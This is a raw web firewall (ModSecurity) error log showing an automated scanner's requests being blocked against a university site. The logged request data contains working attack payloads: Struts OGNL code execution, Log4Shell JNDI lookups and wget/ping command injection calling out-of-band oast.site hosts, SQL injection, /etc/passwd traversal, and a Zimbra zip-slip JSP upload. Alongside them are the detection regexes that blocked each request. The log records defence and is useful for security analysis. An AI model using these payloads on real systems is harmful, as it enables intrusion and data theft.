[Tue Aug 29 11:33:55.396104 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "digilibft.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11M8Co-f0AAARjjUEAAAAL"]
[Tue Aug 29 11:33:55.502527 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:item_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:item_id: 0 union select sleep(5) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11M8Co-f0AAARQ4FEAAAAB"]
[Tue Aug 29 11:33:57.359207 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:plot. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:plot: ;wget http:/cjmn8l5jmimk2adbbnlgkerpqr3hz5i1r.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NcCo-f0AAARy-20AAAAb"]
[Tue Aug 29 11:33:57.489588 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.set [hostname "digilibft.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11NcCo-f0AAARy-3MAAAAb"]
[Tue Aug 29 11:33:58.184037 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id_products[]: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(6)))xoOt)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NsCo-f0AAASNzncAAAAQ"]
[Tue Aug 29 11:33:59.115201 2023] [:error] [pid 1173] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');  found within ARGS:options: [\\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO extra_field_options(option_value) VALUES ('2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '2UdxkpHWJwFq0iCfNXfFeNNF0Wt', 16,0) ON DUPLICATE KEY UPDATE     tag='2UdxkpHWJwFq0iCfNXfFeNNF0Wt', field_id=16, count=0;  -- \\x..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASVoFgAAAAe"]
[Tue Aug 29 11:33:59.367465 2023] [:error] [pid 1172] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- \\x22] found within ARGS:options: [\\x22test') or 1=1 -- \\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASUXy0AAAAd"]
[Tue Aug 29 11:34:00.421490 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:CityId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')), found within ARGS:CityId: 33'union select sys.fn_sqlvarbasetostr(HashBytes('MD5','2UdxjgrcjQwqw1tZm6TSev79zjh')),2--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/user/City_ajax.aspx"] [unique_id "ZO11OMCo-f0AAASPDJkAAAAS"]
[Tue Aug 29 11:34:01.430124 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:S1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:S1: (SELECT md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/yyoa/common/js/menu/test.jsp"] [unique_id "ZO11OcCo-f0AAASIz-sAAAAG"]
[Tue Aug 29 11:34:03.359948 2023] [:error] [pid 1169] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-419}${:-626}.${hostName}.postdata.cjmn8l5jmimk2adbbnlg49gpdx7sydpcc.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO11O8Co-f0AAASRn-gAAAAW"]
[Tue Aug 29 11:34:04.399284 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: { found within ARGS:login: $(ping${IFS}-nc${IFS}2${IFS}`whoami`.cjmn8l5jmimk2adbbnlgft19a1xdnapf7.oast.site)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/login/index.php"] [unique_id "ZO11PMCo-f0AAASLqCIAAAAM"]
[Tue Aug 29 11:34:06.422936 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22},{\\x22 found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22kevinlab\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22kevin003\\x22},{\\x22name\\x22:\\x22device_key\\x22,\\x22value\\x22:\\x22a2fe6b53-e09d-46df-8c9a-e666430e163e\\x22},{\\x22name\\x22:\\x22auto_login\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO11PsCo-f0AAARjjVEAAAAL"]
[Tue Aug 29 11:34:07.297740 2023] [:error] [pid 1183] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "digilibft.unla.ac.id"] [uri "/user/register"] [unique_id "ZO11P8Co-f0AAASfNuEAAAAg"]
[Tue Aug 29 11:34:07.320435 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:month: 1 AND (SELECT 6881 FROM (SELECT(SLEEP(6)))iEAn)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11P8Co-f0AAARQ4F0AAAAB"]
[Tue Aug 29 11:34:08.315668 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QMCo-f0AAASMgfoAAAAO"]
[Tue Aug 29 11:34:08.332137 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:country_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:country_id: 1 AND (SELECT 42 FROM (SELECT(SLEEP(6)))b)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAARjjVQAAAAL"]
[Tue Aug 29 11:34:08.377353 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:term: aaa' union select 1,sleep(6),3-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAASK4eYAAAAI"]
[Tue Aug 29 11:34:09.329450 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '-- - found within ARGS:username: admin' or '1'='1'-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11QcCo-f0AAASI0AkAAAAG"]
[Tue Aug 29 11:34:10.307956 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username: admin cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/weblogin.cgi"] [unique_id "ZO11QsCo-f0AAAPDoMoAAAAP"]
[Tue Aug 29 11:34:10.309676 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QsCo-f0AAASLqC8AAAAM"]
[Tue Aug 29 11:34:10.364653 2023] [:error] [pid 1183] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:x: ${jndi:ldap://${:-178}${:-654}.${hostName}.uri.cjmn8l5jmimk2adbbnlghfr8emia7c4eb.oast.site/a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11QsCo-f0AAASfNuoAAAAg"]
[Tue Aug 29 11:34:11.373748 2023] [:error] [pid 1168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:company_id[1][0]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:company_id[1][0]: test\\x22) and extractvalue(1,concat(0x7e,md5(999999999))) -- a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11Q8Co-f0AAASQqAwAAAAT"]
[Tue Aug 29 11:34:11.402420 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlg8r5h8smp38t15.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlg8r5h8smp38t15.oast.site}: ${jndi:ldap://${:-178}${:-654}.${hostName}.cookievalue.cjmn8l5jmimk2adbbnlgiuuj95u5yd6g1.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11Q8Co-f0AAAQKOtMAAAAs"]
[Tue Aug 29 11:34:12.419404 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sort. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:sort: 1 and extractvalue(1,concat(0x7e,md5(999999999))) -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/api.php"] [unique_id "ZO11RMCo-f0AAAShCWEAAAAi"]
[Tue Aug 29 11:34:13.317454 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:userIdentifiers. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union(select found within ARGS:userIdentifiers: -1)union(select(3),null,null,null,null,null,str(98989*44313),null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/mobile/plugin/SyncUserInfo.jsp"] [unique_id "ZO11RcCo-f0AAASLqDUAAAAM"]
[Tue Aug 29 11:34:15.313420 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgynxxcz3ugen9d.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgynxxcz3ugen9d.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"] [unique_id "ZO11R8Co-f0AAASK4fUAAAAI"]
[Tue Aug 29 11:34:15.349008 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11R8Co-f0AAASLqD0AAAAM"]
[Tue Aug 29 11:34:16.320042 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23 found within TX:1: example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11SMCo-f0AAASHh7oAAAAD"]
[Tue Aug 29 11:34:16.344483 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "digilibft.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASLqEEAAAAM"]
